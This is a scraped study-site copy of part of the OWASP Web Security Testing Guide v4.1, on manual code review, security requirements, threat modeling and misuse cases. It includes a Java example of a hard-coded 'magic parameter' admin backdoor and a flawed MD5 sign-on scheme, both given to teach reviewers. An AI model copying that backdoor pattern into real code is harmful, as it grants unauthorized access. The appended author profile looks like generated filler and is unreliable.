http://www.host/application?magic=sf8g7sfjdsurtsdieerwqredsgnfg8d</p><p>Given that all of the other parameters were simple two- and three-characters fields, it is not possible to start guessing</p><p>combinations at approximately 28 characters. A web application scanner will need to brute force (or guess) the entire</p><p>https://owasp.org/www-project-benchmark/</p><p>Web Security Testing Guide v4.1</p><p>21</p><p>key space of 30 characters. That is up to 30^28 permutations, or trillions of HTTP requests. That is an electron in a</p><p>digital haystack.</p><p>The code for this exemplar Magic Parameter check may look like the following:</p><p>public void doPost( HttpServletRequest request, HttpServletResponse response) {</p><p>String magic = “sf8g7sfjdsurtsdieerwqredsgnfg8d”;</p><p>boolean admin = magic.equals( request.getParameter(“magic”));</p><p>if (admin) doAdmin( request, response);</p><p>else … // normal processing</p><p>}</p><p>By looking in the code, the vulnerability practically leaps off the page as a potential problem.</p><p>Example 2: Bad Cryptography</p><p>Cryptography is widely used in web applications. Imagine that a developer decided to write a simple cryptography</p><p>algorithm to sign a user in from site A to site B automatically. In his/her wisdom, the developer decides that if a user is</p><p>logged into site A, then he/she will generate a key using an MD5 hash function that comprises: Hash { username :</p><p>date }</p><p>When a user is passed to site B, he/she will send the key on the query string to site B in an HTTP re-direct. Site B</p><p>independently computes the hash, and compares it to the hash passed on the request. If they match, site B signs the</p><p>user in as the user they claim to be.</p><p>As the scheme is explained the inadequacies can be worked out. Anyone that figures out the scheme (or is told how it</p><p>works, or downloads the information from Bugtraq) can log in as any user. Manual inspection, such as a review or code</p><p>inspection, would have uncovered this security issue quickly. A black-box web application scanner would not have</p><p>uncovered the vulnerability. It would have seen a 128-bit hash that changed with each user, and by the nature of hash</p><p>functions, did not change in any predictable way.</p><p>A Note about Static Source Code Review Tools</p><p>Many organizations have started to use static source code scanners. While they undoubtedly have a place in a</p><p>comprehensive testing program, it is necessary to highlight some fundamental issues about why this approach is not</p><p>effective when used alone. Static source code analysis alone cannot identify issues due to flaws in the design, since it</p><p>cannot understand the context in which the code is constructed. Source code analysis tools are useful in determining</p><p>security issues due to coding errors, however significant manual effort is required to validate the findings.</p><p>Deriving Security Test Requirements</p><p>To have a successful testing program, one must know what the testing objectives are. These objectives are specified by</p><p>the security requirements. This section discusses in detail how to document requirements for security testing by</p><p>deriving them from applicable standards and regulations, from positive application requirements (specifying what the</p><p>application is supposed to do), and from negative application requirements (specifying what the application should not</p><p>do). It also discusses how security requirements effectively drive security testing during the SDLC and how security test</p><p>data can be used to effectively manage software security risks.</p><p>Testing Objectives</p><p>One of the objectives of security testing is to validate that security controls operate as expected. This is documented via</p><p>security requirements that describe the functionality of the security control. At a high level, this means proving</p><p>confidentiality, integrity, and availability of the data as well as the service. The other objective is to validate that security</p><p>controls are implemented with few or no vulnerabilities. These are common vulnerabilities, such as the OWASP Top</p><p>Ten, as well as vulnerabilities that have been previously identified with security assessments during the SDLC, such as</p><p>threat modeling, source code analysis, and penetration test.</p><p>Security Requirements Documentation</p><p>https://owasp.org/www-project-top-ten/</p><p>Web Security Testing Guide v4.1</p><p>22</p><p>The first step in the documentation of security requirements is to understand the business requirements . A business</p><p>requirement document can provide initial high-level information on the expected functionality of the application. For</p><p>example, the main purpose of an application may be to provide financial services to customers or to</p><p>allow goods to be</p><p>purchased from an on-line catalog. A security section of the business requirements should highlight the need to protect</p><p>the customer data as well as to comply with applicable security documentation such as regulations, standards, and</p><p>policies.</p><p>A general checklist of the applicable regulations, standards, and policies is a good preliminary security compliance</p><p>analysis for web applications. For example, compliance regulations can be identified by checking information about the</p><p>business sector and the country or state where the application will operate. Some of these compliance guidelines and</p><p>regulations might translate into specific technical requirements for security controls. For example, in the case of</p><p>financial applications, compliance with the Federal Financial Institutions Examination Council guidelines for</p><p>authentication requires that financial institutions implement applications that mitigate weak authentication risks with</p><p>multi-layered security control and multi-factor authentication.</p><p>Applicable industry standards for security must also be captured by the general security requirement checklist. For</p><p>example, in the case of applications that handle customer credit card data, compliance with the PCI Security Standards</p><p>Council Data Security Standard (DSS) forbids the storage of PINs and CVV2 data and requires that the merchant</p><p>protect magnetic strip data in storage and transmission with encryption and on display by masking. Such PCI DSS</p><p>security requirements could be validated via source code analysis.</p><p>Another section of the checklist needs to enforce general requirements for compliance with the organization’s</p><p>information security standards and policies. From the functional requirements perspective, requirements for the security</p><p>control need to map to a specific section of the information security standards. An example of such a requirement can</p><p>be: “a password complexity of ten alphanumeric characters must be enforced by the authentication controls used by the</p><p>application.” When security requirements map to compliance rules, a security test can validate the exposure of</p><p>compliance risks. If violation with information security standards and policies are found, these will result in a risk that</p><p>can be documented and that the business has to manage. Since these security compliance requirements are</p><p>enforceable, they need to be well documented and validated with security tests.</p><p>Security Requirements Validation</p><p>From the functionality perspective, the validation of security requirements is the main objective of security testing. From</p><p>the risk management perspective, the validation of security requirements is the objective of information security</p><p>assessments. At a high level, the main goal of information security assessments is the identification of gaps in security</p><p>controls, such as lack of basic authentication, authorization, or encryption controls. Examined further, the security</p><p>assessment objective is risk analysis, such as the identification of potential weaknesses in security controls that ensure</p><p>the confidentiality, integrity, and availability of the data. For example, when the application deals with personally</p><p>identifiable information (PII) and sensitive data, the security requirement to be validated is the compliance with the</p><p>company information security policy requiring encryption of such data in transit and in storage. Assuming encryption is</p><p>used to protect the data, encryption algorithms and key lengths need to comply with the organization’s encryption</p><p>standards. These might require that only certain algorithms and key lengths be used. For example, a security</p><p>requirement that can be security tested is verifying that only allowed ciphers are used (e.g., SHA-256, RSA, AES) with</p><p>allowed minimum key lengths (e.g., more than 128 bit for symmetric and more than 1024 for asymmetric encryption).</p><p>From the security assessment perspective, security requirements can be validated at different phases of the SDLC by</p><p>using different artifacts and testing methodologies. For example, threat modeling focuses on identifying security flaws</p><p>during design; secure code analysis and reviews focus on identifying security issues in source code during</p><p>development; and penetration testing focuses on identifying vulnerabilities in the application during testing or</p><p>validation.</p><p>Security issues that are identified early in the SDLC can be documented in a test plan so they can be validated later</p><p>with security tests. By combining the results of different testing techniques, it is possible to derive better security test</p><p>cases and increase the level of assurance of the security requirements. For example, distinguishing true vulnerabilities</p><p>from the un-exploitable ones is possible when the results of penetration tests and source code analysis are combined.</p><p>Considering the security test for a SQL injection vulnerability, for example, a black-box test might first involve a scan of</p><p>https://www.fdic.gov/news/news/financial/2011/fil11050.html</p><p>https://www.pcisecuritystandards.org/pci_security/</p><p>Web Security Testing Guide v4.1</p><p>23</p><p>the application to fingerprint the vulnerability. The first evidence of a potential SQL injection vulnerability that can be</p><p>validated is the generation of a SQL exception. A further validation of the SQL vulnerability might involve manually</p><p>injecting attack vectors to modify the grammar of the SQL query for an information disclosure exploit. This might involve</p><p>a lot of trial-and-error analysis before the malicious query is executed. Assuming the tester has the source code, he or</p><p>she might directly learn from the source code analysis how to construct the SQL attack vector that will successfully</p><p>exploit the vulnerability (e.g., execute a malicious query returning confidential data to unauthorized user). This can</p><p>expedite the validation of the SQL vulnerability.</p><p>Threats and Countermeasures Taxonomies</p><p>A threat and countermeasure classification , which takes into consideration root causes of vulnerabilities, is the</p><p>critical factor in verifying that security controls are designed, coded, and built to mitigate the impact of the exposure of</p><p>such vulnerabilities. In the case of web applications, the exposure of security controls to common vulnerabilities, such</p><p>as the OWASP Top Ten, can be a good starting point to derive general security requirements. The OWASP Testing</p><p>Guide Checklist is a helpful resource for guiding testers through specific vulnerabilities and validation tests.</p><p>The focus of a threat and countermeasure categorization is to define security requirements in terms of the threats and</p><p>the root cause of the vulnerability. A threat can be categorized by using STRIDE, an acronym for Spoofing, Tampering,</p><p>Repudiation, Information disclosure, Denial of service, and Elevation of privilege. The root cause can be categorized as</p><p>security flaw in design, a security bug in coding, or an issue due to insecure configuration. For example, the root cause</p><p>of weak authentication vulnerability might be the lack of mutual authentication when data crosses a trust boundary</p><p>between the client and server tiers of the application. A security requirement that captures the threat of non-repudiation</p><p>during an architecture design review allows for the documentation of the requirement for the countermeasure (e.g.,</p><p>mutual authentication) that can be validated later on with security tests.</p><p>A threat and countermeasure categorization for vulnerabilities can also be used to document security requirements for</p><p>secure coding such as secure coding standards. An example of a common coding error in authentication controls</p><p>consists of applying a hash function to encrypt a password, without applying a seed to the value. From the secure</p><p>coding perspective, this is a vulnerability that affects the encryption used for authentication with a vulnerability root</p><p>cause in a coding error. Since the root cause is insecure coding, the security requirement can be documented in secure</p><p>coding standards and validated through secure</p><p>code reviews during the development phase of the SDLC.</p><p>Security Testing and Risk Analysis</p><p>Security requirements need to take into consideration the severity of the vulnerabilities to support a risk mitigation</p><p>strategy . Assuming that the organization maintains a repository of vulnerabilities found in applications (i.e, a</p><p>vulnerability knowledge base), the security issues can be reported by type, issue, mitigation, root cause, and mapped</p><p>to the applications where they are found. Such a vulnerability knowledge base can also be used to establish a metrics</p><p>to analyze the effectiveness of the security tests throughout the SDLC.</p><p>For example, consider an input validation issue, such as a SQL injection, which was identified via source code analysis</p><p>and reported with a coding error root cause and input validation vulnerability type. The exposure of such vulnerability</p><p>can be assessed via a penetration test, by probing input fields with several SQL injection attack vectors. This test might</p><p>validate that special characters are filtered before hitting the database and mitigate the vulnerability. By combining the</p><p>results of source code analysis and penetration testing, it is possible to determine the likelihood and exposure of the</p><p>vulnerability and calculate the risk rating of the vulnerability. By reporting vulnerability risk ratings in the findings (e.g.,</p><p>test report) it is possible to decide on the mitigation strategy. For example, high and medium risk vulnerabilities can be</p><p>prioritized for remediation, while low risk vulnerabilities can be fixed in further releases.</p><p>By considering the threat scenarios of exploiting common vulnerabilities, it is possible to identify potential risks that the</p><p>application security control needs to be security tested for. For example, the OWASP Top Ten vulnerabilities can be</p><p>mapped to attacks such as phishing, privacy violations, identify theft, system compromise, data alteration or data</p><p>destruction, financial loss, and reputation loss. Such issues should be documented as part of the threat scenarios. By</p><p>thinking in terms of threats and vulnerabilities, it is possible to devise a battery of tests that simulate such attack</p><p>scenarios. Ideally, the organization’s vulnerability knowledge base can be used to derive security-risk-driven test cases</p><p>to validate the most likely attack scenarios. For example, if identity theft is considered high risk, negative test scenarios</p><p>https://github.com/OWASP/wstg/tree/master/checklist</p><p>https://en.wikipedia.org/wiki/STRIDE_(security)</p><p>Web Security Testing Guide v4.1</p><p>24</p><p>should validate the mitigation of impacts deriving from the exploit of vulnerabilities in authentication, cryptographic</p><p>controls, input validation, and authorization controls.</p><p>Deriving Functional and Non-Functional Test Requirements</p><p>Functional Security Requirements</p><p>From the perspective of functional security requirements, the applicable standards, policies, and regulations drive both</p><p>the need for a type of security control as well as the control functionality. These requirements are also referred to as</p><p>“positive requirements”, since they state the expected functionality that can be validated through security tests.</p><p>Examples of positive requirements are: “the application will lockout the user after six failed log on attempts” or</p><p>“passwords need to be a minimum of ten alphanumeric characters”. The validation of positive requirements consists of</p><p>asserting the expected functionality and can be tested by re-creating the testing conditions and running the test</p><p>according to predefined inputs. The results are then shown as as a fail or pass condition.</p><p>In order to validate security requirements with security tests, security requirements need to be function-driven. They</p><p>need to highlight the expected functionality (the what) and imply the implementation (the how). Examples of high-level</p><p>security design requirements for authentication can be:</p><p>Protect user credentials and shared secrets in transit and in storage.</p><p>Mask any confidential data in display (e.g., passwords, accounts).</p><p>Lock the user account after a certain number of failed log in attempts.</p><p>Do not show specific validation errors to the user as a result of a failed log on.</p><p>Only allow passwords that are alphanumeric, include special characters, and are a minimum ten characters in</p><p>length, to limit the attack surface.</p><p>Allow for password change functionality only to authenticated users by validating the old password, the new</p><p>password, and the user’s answer to the challenge question, to prevent brute forcing of a password via password</p><p>change.</p><p>The password reset form should validate the user’s username and the user’s registered email before sending the</p><p>temporary password to the user via email. The temporary password issued should be a one-time password. A link</p><p>to the password reset web page will be sent to the user. The password reset web page should validate the user’s</p><p>temporary password, the new password, as well as the user’s answer to the challenge question.</p><p>Risk-Driven Security Requirements</p><p>Security tests must also be risk-driven. They need to validate the application for unexpected behavior, or negative</p><p>requirements.</p><p>Examples of negative requirements are:</p><p>The application should not allow for the data to be altered or destroyed.</p><p>The application should not be compromised or misused for unauthorized financial transactions by a malicious</p><p>user.</p><p>Negative requirements are more difficult to test, because there is no expected behavior to look for. Looking for expected</p><p>behavior to suit the above requirements might require a threat analyst to unrealistically come up with unforeseeable</p><p>input conditions, causes, and effects. Hence, security testing needs to be driven by risk analysis and threat modeling.</p><p>The key is to document the threat scenarios, and the functionality of the countermeasure as a factor to mitigate a threat.</p><p>For example, in the case of authentication controls, the following security requirements can be documented from the</p><p>threats and countermeasures perspective:</p><p>Encrypt authentication data in storage and transit to mitigate risk of information disclosure and authentication</p><p>protocol attacks.</p><p>Encrypt passwords using non-reversible encryption such as using a digest (e.g., HASH) and a seed to prevent</p><p>dictionary attacks.</p><p>Web Security Testing Guide v4.1</p><p>25</p><p>Lock out accounts after reaching a log on failure threshold and enforce password complexity to mitigate risk of</p><p>brute force password attacks.</p><p>Display generic error messages upon validation of credentials to mitigate risk of account harvesting or</p><p>enumeration.</p><p>Mutually authenticate client and server to prevent non-repudiation and Man In the Middle (MiTM) attacks.</p><p>Threat modeling tools such as threat trees and attack libraries can be useful to derive the negative test scenarios. A</p><p>threat tree will assume a root attack (e.g., attacker might be able to read other users’ messages) and identify different</p><p>exploits of security controls (e.g., data validation fails because of a SQL injection vulnerability) and necessary</p><p>countermeasures (e.g., implement data validation and parametrized queries) that could be validated to be effective in</p><p>mitigating such attacks.</p><p>Deriving Security Test Requirements Through Use and Misuse Cases</p><p>A prerequisite to describing the application functionality is to understand what the application is supposed to do and</p><p>how. This can be done by describing use cases. Use cases, in the graphical form as is commonly used in software</p><p>engineering, show the interactions of actors and their relations. They help to identify the actors in the application, their</p><p>relationships, the intended sequence of actions for each scenario, alternative actions, special requirements,</p><p>preconditions, and post-conditions.</p><p>Similar to use cases, misuse and abuse cases describe unintended and malicious use scenarios of the application.</p><p>These misuse cases provide a way to describe scenarios of how an attacker could misuse and abuse the application.</p><p>By going through the individual</p>
  • 3572-Texto do artigo-10765-1-10-20161024
  • Comportamentos Seguros para o Tratamento de Dados Pessoais
  • Screenshot_2024-10-03-18-58-21-514_com uniasselvi leonardo
  • Metodologia de Gestão de Riscos
  • Ebook "Guia Completo para Mães de Primeira Viagem Cuidados Essenciais com o Recém-Nascido e Como a Tecnologia Pode Ajudar
  • Titularidade na LGPD
  • Função do Encarregado na LGPD
  • Módulo 2 - Tratamento de dados
  • Módulo 1 - Para entender a LGPD
  • Aplicacao LGPD
  • IMG_20241001_152136797
  • Enunciado do Trabalho Prático Módulo 1- ASL
  • Tratamento de Dados Pessoais
  • Considerando as disposições do Código Penal Brasileiro sobre homicídio, qual das seguintes afirmações descreve corretamente o objeto material desse...
  • o conceito de "infraestrutura do código " (IAC)no contexto de devOps tem como principal objetivo:
  • O núcleo de gerenciamento é composto por diversas publicações, cada uma delas relacionada a um estágio do ciclo de vida do serviço, contendo orient...
  • De acordo com a Lei Geral de Proteção de Dados, no caso de vazamento de dados pessoais, compete ao Controlador, em prazo razoável, comunicar a Auto...
  • De acordo com a Lei Geral de Proteção de Dados (LGPD), artigo 5º, XVII, o que é o relatório de impacto à proteção de dados? * 5 pontos a. Documenta...
  • O artigo 52 da Lei Geral de Proteção de Dados (LGPD) estabelece as infrações àqueles que violarem a privacidade de dados pessoais. Qual opção NÃO c...
  • Observadas as exigências da Lei Geral de Proteção de Dados, quais das opções abaixo NÃO deveria constar em um Plano de Contingência de resposta a u...
  • De acordo com a Lei Geral de Proteção de Dados (LGPD), identifique a alternativa que melhor apresente as recomendações de tratamento de dados pesso...
  • De acordo com a Lei Geral de Proteção de Dados, o Operador é: * 5 pontos a. Faz negociações na Bolsa de Valores em nome de seu cliente, devendo pr...
  • A empresa XPTO Indústria Automotiva Ltda. adotou todas as providências necessárias para adequar-se à Lei Geral de Proteção de Dados, solicitando ao...
  • Marcar para revisão Sobre o processo de Monitoramento e Controle dos Riscos, podemos dizer que: A Uma vez os Riscos identificados, priorizados e in...
  • A respeito dos impactos gerados por ajustes ou regulagem, é correto afirmar que:
  • A respeito do Simetro é correto afirmar
  • programa-eqe-478
  • Projeto-2-versAúo-final-CD

Perguntas dessa disciplina

Grátis

Uma organização de serviços de TI está implementando o ITil-V4 para lidar com desafios de computação em nuvem. Eles pretendem usar o ITIL-V4 para m...

Grátis

7. Dado v1 = (1, 1, 1), v2 = (1, 2, 3), v3 = (3, 0, 2) e v4 = (2,−1, 1).Mostre que(a) span{v1, v2, v3, v4} = R3(b) Existe um S ⊂ {v1, v2, v3, v4...
Assinale a alternativa que representa a lista de adjacência referente ao vértice u3 para o grafo: a) v1, v2, v4b) v1, v2, v4, v5c) v1, v2, v5d...
Sendo v1 = 15, v2 = 10, v3 = 5, v4 = 0, defina qual será a resposta (VERDADEIRO OU FALSO) para as sentenças lógicas abaixo. (v2 = 10) OU (v4 = 5) ...
Em um processo deve ser utilizado o mínimo número de etapas necessárias para atingir os objetivos. Este conceito está ligado ao Princípio Orientado...

ESTÁCIO

wstg-v4 1 - Gestão de Tecnologia da Informação (2024)
Top Articles
Latest Posts
Recommended Articles
Article information

Author: Catherine Tremblay

Last Updated:

Views: 5424

Rating: 4.7 / 5 (67 voted)

Reviews: 90% of readers found this page helpful

Author information

Name: Catherine Tremblay

Birthday: 1999-09-23

Address: Suite 461 73643 Sherril Loaf, Dickinsonland, AZ 47941-2379

Phone: +2678139151039

Job: International Administration Supervisor

Hobby: Dowsing, Snowboarding, Rowing, Beekeeping, Calligraphy, Shooting, Air sports

Introduction: My name is Catherine Tremblay, I am a precious, perfect, tasty, enthusiastic, inexpensive, vast, kind person who loves writing and wants to share my knowledge and understanding with you.